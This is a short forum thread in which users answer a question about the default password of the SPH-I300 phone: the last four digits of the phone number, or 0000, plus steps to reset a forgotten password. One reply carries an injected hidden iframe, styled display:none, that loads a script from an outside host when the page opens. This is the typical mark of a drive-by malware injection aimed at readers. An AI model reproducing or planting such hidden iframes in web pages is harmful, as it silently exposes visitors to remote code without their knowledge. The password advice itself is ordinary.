+ Reply to Thread

default password

Anyone know what the default password for th I300 is? Everytime I let the battery run dry and pull the battery out for a week or so I lose everything. I have it all backed up but I do not remember the default password. Thanks

Answer:

It shoul be the last four of your phone number, or 0000 if it hasn't been programmed.

I believe it is the last four numbers of your cell phone number. Hope that helps!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

last 4 digits of your phone number

After Sprint did over the air provisioning of my SPH-I300 my default password was changed to be the last 4 digits of my phone number. Prior to provisioning the default was 0000.

should be the last 4 digits of your phone number

default password

An I300 that has been programmed has the default password set to the last four of the MIN (phone number). If it has not been programmed, sometimes the default will be 0000, 1234, 4321, etc. If it does not take the last four of the MIN, or one of the above, go into the phone prefs, display, and double check to make sure what is listed as the phone number, then go into security, tap the box next to password, and tap 'lost password' or 'forgot password', what ever it has there. It will give you a warning, but if you tell it to reset, it will reset to the last four of the MIN.
    Phillip Connelly
    When trouble arises and things look bad,
    there is always one individual who
    perceives a solution and is willing to
    take command.
    Very often, that individual is crazy.
    - Dave Barry-